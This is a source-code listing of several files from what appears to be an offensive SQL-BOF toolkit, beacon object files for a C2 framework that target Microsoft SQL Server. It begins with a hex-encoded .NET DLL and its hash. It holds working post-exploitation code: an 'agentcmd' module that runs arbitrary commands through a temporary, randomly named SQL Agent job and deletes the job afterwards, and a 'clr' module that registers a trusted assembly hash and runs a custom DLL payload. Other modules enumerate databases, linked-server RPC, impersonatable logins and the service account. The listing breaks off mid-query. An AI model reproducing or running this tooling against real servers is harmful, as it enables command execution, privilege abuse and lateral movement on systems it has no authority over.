000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000000C000000203900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";

//
// This is the SHA-512 hash for the LDAP server .NET assembly in SQL byte format
//
char* LDAP_DLL_HASH = "45077873b42284716609bf5d675d98ffa13c20e53008bb3d3f26c0971bcf7d9adf80c2db84300a81168e63d902532235c8daf852d58f9f2eadcb517fb5b83fb9";


================================================
FILE: AD-BOF/SQL-BOF/src/SQL/agentcmd/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"
#include "sql_agent.c"
#include "sql_modules.c"

void ExecuteAgentCommand(char *server, char *database, char *link, char *impersonate, char *command, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  char *jobName = NULL;
  char *stepName = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Executing command in SQL Agent job on %s\n\n", server);
  } else {
    internal_printf("[*] Executing command in SQL Agent job on %s via %s\n\n", link, server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to allocate statement handle\n");
    goto END;
  }

  if (link != NULL) {
    if (IsRpcEnabled(stmt, link)) {
      internal_printf("[*] RPC out is enabled\n");
    } else {
      internal_printf("[!] RPC out is not enabled\n");
      goto END;
    }

    ODBC32$SQLCloseCursor(stmt);
  }

  if (!IsAgentRunning(stmt, link, impersonate)) {
    internal_printf("[!] SQL Agent is not running\n");
    goto END;
  }

  ret = ODBC32$SQLCloseCursor(stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to close cursor\n");
    goto END;
  }

  internal_printf("[*] SQL Agent is running\n");

  InitRandomSeed();
  jobName = GenerateRandomString(8);
  stepName = GenerateRandomString(8);

  if (!AddAgentJob(stmt, link, impersonate, command, jobName, stepName)) {
    internal_printf("[!] Failed to add agent job\n");
    goto END;
  }

  ClearCursor(stmt);
  internal_printf("[*] Added job\n");

  if (!GetAgentJobs(stmt, link, impersonate)) {
    internal_printf("[!] Failed to get agent jobs\n");
    goto END;
  }

  internal_printf("\n");
  PrintQueryResults(stmt, TRUE);

  ret = ODBC32$SQLCloseCursor(stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to close cursor\n");
    goto END;
  }

  internal_printf("\n[*] Executing job %s and waiting 5 seconds...\n", jobName);
  ExecuteAgentJob(stmt, link, impersonate, jobName);

  ClearCursor(stmt);

  if (!DeleteAgentJob(stmt, link, impersonate, jobName)) {
    internal_printf("[!] Failed to delete agent job\n");
    goto END;
  }

  internal_printf("[*] Job %s deleted\n", jobName);

  ClearCursor(stmt);

  if (!GetAgentJobs(stmt, link, impersonate)) {
    internal_printf("[!] Failed to get agent jobs\n");
    goto END;
  }

  internal_printf("\n");
  PrintQueryResults(stmt, TRUE);

END:
  if (jobName != NULL)
    intFree(jobName);
  if (stepName != NULL)
    intFree(stepName);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *command;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  command = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  ExecuteAgentCommand(server, database, link, impersonate, command, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/agentstatus/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"
#include "sql_agent.c"
#include "sql_modules.c"

void CheckAgentStatus(char *server, char *database, char *link, char *impersonate, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Getting SQL agent status on %s\n\n", server);
  } else {
    internal_printf("[*] Getting SQL agent status on %s via %s\n\n", link,
                    server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to allocate statement handle\n");
    goto END;
  }

  if (!IsAgentRunning(stmt, link, impersonate)) {
    internal_printf("[!] SQL Agent is not running\n");
    goto END;
  }

  ret = ODBC32$SQLCloseCursor(stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to close cursor\n");
    goto END;
  }

  internal_printf("[*] SQL Agent is running\n\n");

  if (!GetAgentJobs(stmt, link, impersonate)) {
    internal_printf("[!] Failed to get agent jobs\n");
    goto END;
  }

  PrintQueryResults(stmt, TRUE);

END:
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  CheckAgentStatus(server, database, link, impersonate, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/checkrpc/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CheckRpc(char *server, char *database, char *link, char *impersonate, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Enumerating RPC status of linked servers on %s\n\n",
                    server);
  } else {
    internal_printf(
        "[*] Enumerating RPC status of linked servers on %s via %s\n\n", link,
        server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  SQLCHAR *query = (SQLCHAR *)"SELECT name, is_rpc_out_enabled FROM sys.servers";
  if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, FALSE)) {
    goto END;
  }
  PrintQueryResults(stmt, TRUE);

END:
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  CheckRpc(server, database, link, impersonate, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/clr/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"
#include "sql_clr.c"
#include "sql_modules.c"

void ExecuteClrAssembly(char *server, char *database, char *link, char *impersonate, char *function, char *hash, char *hexBytes, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  SQLRETURN ret;

  InitRandomSeed();
  char *dllPath = GenerateRandomString(8);
  char *assemblyName = GenerateRandomString(8);

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Performing CLR custom assembly attack on %s\n\n",
                    server);
  } else {
    internal_printf(
        "[*] Performing CLR custom assembly attack on %s via %s\n\n", link,
        server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to allocate statement handle\n");
    goto END;
  }

  if (IsModuleEnabled(stmt, "clr enabled", link, impersonate)) {
    internal_printf("[*] CLR is enabled\n");
  } else {
    internal_printf("[!] CLR is not enabled\n");
    goto END;
  }

  ret = ODBC32$SQLCloseCursor(stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to close cursor\n");
    goto END;
  }

  if (link != NULL) {
    if (IsRpcEnabled(stmt, link)) {
      internal_printf("[*] RPC out is enabled\n");
    } else {
      internal_printf("[!] RPC out is not enabled\n");
      goto END;
    }

    ret = ODBC32$SQLCloseCursor(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Failed to close cursor\n");
      goto END;
    }
  }

  if (AssemblyHashExists(stmt, hash, link, impersonate)) {
    internal_printf( "[!] Assembly hash already exists in sys.trusted_assesmblies\n");
    internal_printf("[*] Dropping existing assembly hash before continuing\n");

    ret = ODBC32$SQLCloseCursor(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Failed to close cursor\n");
      goto END;
    }

    if (!DeleteTrustedAssembly(stmt, hash, link, impersonate)) {
      internal_printf("[!] Failed to drop existing assembly hash\n");
      goto END;
    }
  } else {
    ret = ODBC32$SQLCloseCursor(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Failed to close cursor\n");
      goto END;
    }
  }

  if (!AddTrustedAssembly(stmt, dllPath, hash, link, impersonate)) {
    internal_printf("[!] Failed to add trusted assembly\n");
    goto END;
  }

  internal_printf("[*] Added SHA-512 hash for DLL to sys.trusted_assemblies with the name \"%s\"\n", dllPath);

  if (!DeleteTrustedAssemblyResources(stmt, assemblyName, function, FALSE, link, impersonate)) {
    internal_printf("[!] Failed to drop existing assembly and procedure\n");
    goto END;
  }

  internal_printf("[*] Creating a new custom assembly with the name \"%s\"\n", assemblyName);
  if (!CreateAssembly(stmt, assemblyName, hexBytes, link, impersonate)) {
    internal_printf("[!] Failed to create custom assembly. This probably happened as the assembly was uploaded before using a different name. See SQL error message\n");
    goto END;
  }

  if (!AssemblyExists(stmt, assemblyName, link, impersonate)) {
    internal_printf("[!] Failed to create custom assembly\n");
    internal_printf("[*] Cleaning up...\n");
    DeleteTrustedAssembly(stmt, hash, link, impersonate);
    DeleteTrustedAssemblyResources(stmt, assemblyName, function, FALSE, link, impersonate);
    goto END;
  }

  internal_printf("[*] Loading DLL into stored procedure \"%s\"\n", function);
  CreateAssemblyStoredProc(stmt, assemblyName, function, FALSE, link, impersonate);

  if (!AssemblyStoredProcExists(stmt, function, link, impersonate)) {
    internal_printf("[!] Stored procedure not found\n");
    internal_printf("[*] Cleaning up...\n");
    DeleteTrustedAssembly(stmt, hash, link, impersonate);
    DeleteTrustedAssemblyResources(stmt, assemblyName, function, FALSE, link, impersonate);
    goto END;
  }

  internal_printf("[*] Created \"[%s].[StoredProcedures].[%s]\"\n", assemblyName, function);

  internal_printf("[*] Executing payload...\n");
  ExecuteAssemblyStoredProc(stmt, function, link, impersonate);

  internal_printf("[*] Cleaning up...\n");
  DeleteTrustedAssembly(stmt, hash, link, impersonate);
  DeleteTrustedAssemblyResources(stmt, assemblyName, function, FALSE, link, impersonate);

END:
  intFree(dllPath);
  intFree(assemblyName);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *function;
  char *hash;
  char *hexBytes; // DLL as hex string, not binary
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);
  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  function = BeaconDataExtract(&parser, NULL);
  hash = BeaconDataExtract(&parser, NULL);
  hexBytes = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = (server && *server != 0) ? server : "localhost";
  database = (database && *database != 0) ? database : "master";
  link = (link && *link != 0) ? link : NULL;
  impersonate = (impersonate && *impersonate != 0) ? impersonate : NULL;
  user = (user && *user != 0) ? user : NULL;
  password = (password && *password != 0) ? password : NULL;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  ExecuteClrAssembly(server, database, link, impersonate, function, hash, hexBytes, user, password);
  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/columns/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CheckTableColumns(char *server, char *database, char *link, char *impersonate, char *table, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Displaying columns from table %s in %s on %s\n\n", table, database, server);
  } else {
    internal_printf( "[*] Displaying columns from table %s in %s on %s via %s\n\n", table, database, link, server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  if (link == NULL) {
    char *dbPrefix = "USE ";
    char *dbSuffix = ";";

    size_t useStmtSize = MSVCRT$strlen(dbPrefix) + MSVCRT$strlen(database) + MSVCRT$strlen(dbSuffix) + 1;
    char *useStmt = (char *)intAlloc(useStmtSize * sizeof(char));

    MSVCRT$strcpy(useStmt, dbPrefix);
    MSVCRT$strncat(useStmt, database, useStmtSize - MSVCRT$strlen(useStmt) - 1);
    MSVCRT$strncat(useStmt, dbSuffix, useStmtSize - MSVCRT$strlen(useStmt) - 1);

    if (!HandleQuery(stmt, (SQLCHAR *)useStmt, link, impersonate, FALSE)) {
      goto END;
    }

    char *tablePrefix = "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '";
    char *tableSuffix = "' ORDER BY ORDINAL_POSITION;";

    size_t querySize = MSVCRT$strlen(tablePrefix) + MSVCRT$strlen(table) + MSVCRT$strlen(tableSuffix) + 1;
    char *query = (char *)intAlloc(querySize * sizeof(char));

    MSVCRT$strcpy(query, tablePrefix);
    MSVCRT$strncat(query, table, MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, tableSuffix, MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, FALSE)) {
      goto END;
    }
    PrintQueryResults(stmt, TRUE);

    intFree(query);
    intFree(useStmt);
  } else {
    char *dbPrefix = "SELECT COLUMN_NAME FROM ";
    char *tablePrefix = ".INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '";
    char *tableSuffix = "' ORDER BY ORDINAL_POSITION;";

    size_t querySize = MSVCRT$strlen(dbPrefix) + MSVCRT$strlen(database) + MSVCRT$strlen(tablePrefix) + MSVCRT$strlen(table) + MSVCRT$strlen(tableSuffix) + 1;
    char *query = (char *)intAlloc(querySize * sizeof(char));

    MSVCRT$strcpy(query, dbPrefix);
    MSVCRT$strncat(query, database, querySize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, tablePrefix, querySize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, table, querySize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, tableSuffix, querySize - MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, FALSE)) {
      goto END;
    }
    PrintQueryResults(stmt, TRUE);

    intFree(query);
  }

END:
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *table;
  char *link;
  char *impersonate;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  table = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  table = *table == 0 ? NULL : table;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (table == NULL) {
    internal_printf("[!] Table argument is required\n");
    printoutput(TRUE);
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  CheckTableColumns(server, database, link, impersonate, table, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/databases/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CheckDatabases(char *server, char *database, char *link, char *impersonate, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Enumerating databases on %s\n\n", server);
  } else {
    internal_printf("[*] Enumerating databases on %s via %s\n\n", link, server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] SQLAllocHandle failed\n");
    goto END;
  }

  SQLCHAR *query = (SQLCHAR *)"SELECT sd.dbid, sd.name, SUSER_SNAME(sd.sid) AS db_owner, d.is_trustworthy_on, sd.crdate, sd.filename FROM master.dbo.sysdatabases sd LEFT JOIN sys.databases d ON sd.dbid = d.database_id;";
  if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, FALSE)) {
    goto END;
  }
  PrintQueryResults(stmt, TRUE);

END:
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  CheckDatabases(server, database, link, impersonate, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/impersonate/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CheckImpersonate(char *server, char *database, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLRETURN ret;

  SQLHDBC dbc = ConnectToSqlServerAuth(&env, server, database, user, password);

  if (dbc == NULL) {
    goto END;
  }

  internal_printf("[*] Enumerating users that can be impersonated on %s\n\n", server);

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  SQLCHAR *query = (SQLCHAR *)"SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  PrintQueryResults(stmt, TRUE);

END:
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server = NULL;
  char *database = NULL;
  char *user = NULL;
  char *password = NULL;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  CheckImpersonate(server, database, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/info/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"


typedef struct SQLINFO {
  char *ComputerName;
  char *DomainName;
  char *ServicePid;
  char *ServiceName;
  char *ServiceAccount;
  char *AuthenticationMode;
  char *ForcedEncryption;
  char *Clustered;
  char *SqlServerVersionNumber;
  char *SqlServerMajorVersion;
  char *SqlServerEdition;
  char *SqlServerServicePack;
  char *OsArchitecture;
  char *OsMachineType;
  char *OsVersion;
  char *OsVersionNumber;
  char *CurrentLogin;
  BOOL IsSysAdmin;
  char *ActiveSessions;
} SQLINFO;

void FreeAttr(char *attr) {
  if (attr == NULL) {
    return;
  }

  intFree(attr);
}

void FreeSqlInfo(SQLINFO *info) {
  if (info == NULL) {
    return;
  }

  FreeAttr(info->ComputerName);
  FreeAttr(info->DomainName);
  FreeAttr(info->ServicePid);
  FreeAttr(info->ServiceName);
  FreeAttr(info->ServiceAccount);
  FreeAttr(info->AuthenticationMode);
  FreeAttr(info->ForcedEncryption);
  FreeAttr(info->Clustered);
  FreeAttr(info->SqlServerVersionNumber);
  FreeAttr(info->SqlServerMajorVersion);
  FreeAttr(info->SqlServerEdition);
  FreeAttr(info->SqlServerServicePack);
  FreeAttr(info->OsArchitecture);
  FreeAttr(info->OsMachineType);
  FreeAttr(info->OsVersion);
  FreeAttr(info->OsVersionNumber);
  FreeAttr(info->CurrentLogin);
  FreeAttr(info->ActiveSessions);
}

void GetSQLInfo(char *server, char *database, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLRETURN ret;
  SQLINFO info;
  memset(&info, 0, sizeof(SQLINFO));

  SQLHDBC dbc = ConnectToSqlServerAuth(&env, server, database, user, password);

  if (dbc == NULL) {
    goto END;
  }

  internal_printf("[*] Extracting SQL server information\n");

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  SQLCHAR *query = (SQLCHAR *)"SELECT IS_SRVROLEMEMBER('sysadmin');";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  char *result = GetSingleResult(stmt, FALSE);
  if (result[0] == '1') {
    info.IsSysAdmin = TRUE;
  } else {
    info.IsSysAdmin = FALSE;
  }

  intFree(result);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT @@SERVERNAME;";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.ComputerName = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT default_domain();";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.DomainName = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT CONVERT(VARCHAR(255), SERVERPROPERTY('processid'));";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.ServicePid = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"DECLARE @SQLServerServiceName varchar(250)\n"
                     "DECLARE @SQLServerInstance varchar(250)\n"
                     "if @@SERVICENAME = 'MSSQLSERVER'\n"
                     "BEGIN\n"
                     "set @SQLServerInstance = "
                     "'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER'\n"
                     "set @SQLServerServiceName = 'MSSQLSERVER'\n"
                     "END\n"
                     "ELSE\n"
                     "BEGIN\n"
                     "set @SQLServerInstance = "
                     "'SYSTEM\\CurrentControlSet\\Services\\MSSQL$'+cast(@@"
                     "SERVICENAME as varchar(250))\n"
                     "set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME "
                     "as varchar(250))\n"
                     "END\n"
                     "SELECT @SQLServerServiceName;";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.ServiceName = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"DECLARE @SQLServerInstance varchar(250)\n"
                     "if @@SERVICENAME = 'MSSQLSERVER'\n"
                     "BEGIN\n"
                     "set @SQLServerInstance = "
                     "'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER'\n"
                     "END\n"
                     "ELSE\n"
                     "BEGIN\n"
                     "set @SQLServerInstance = "
                     "'SYSTEM\\CurrentControlSet\\Services\\MSSQL$'+cast(@@"
                     "SERVICENAME as varchar(250))\n"
                     "END\n"
                     "DECLARE @ServiceAccountName varchar(250)\n"
                     "EXECUTE master.dbo.xp_instance_regread\n"
                     "N'HKEY_LOCAL_MACHINE', @SQLServerInstance,\n"
                     "N'ObjectName',@ServiceAccountName OUTPUT, N'no_output'\n"
                     "SELECT @ServiceAccountName;";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.ServiceAccount = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query =
      (SQLCHAR *)"DECLARE @AuthenticationMode INT\n"
                 "EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',\n"
                 "N'Software\\Microsoft\\MSSQLServer\\MSSQLServer',\n"
                 "N'LoginMode', @AuthenticationMode OUTPUT\n"
                 "(SELECT CASE @AuthenticationMode\n"
                 "WHEN 1 THEN 'Windows Authentication'\n"
                 "WHEN 2 THEN 'Windows and SQL Server Authentication'\n"
                 "ELSE 'Unknown'\n"
                 "END);";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.AuthenticationMode = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query =
      (SQLCHAR *)"BEGIN TRY\n"
                 "DECLARE @ForcedEncryption INT\n"
                 "EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',\n"
                 "N'SOFTWARE\\MICROSOFT\\Microsoft SQL "
                 "Server\\MSSQLServer\\SuperSocketNetLib',\n"
                 "N'ForceEncryption', @ForcedEncryption OUTPUT\n"
                 "END TRY\n"
                 "BEGIN CATCH	            \n"
                 "END CATCH\n"
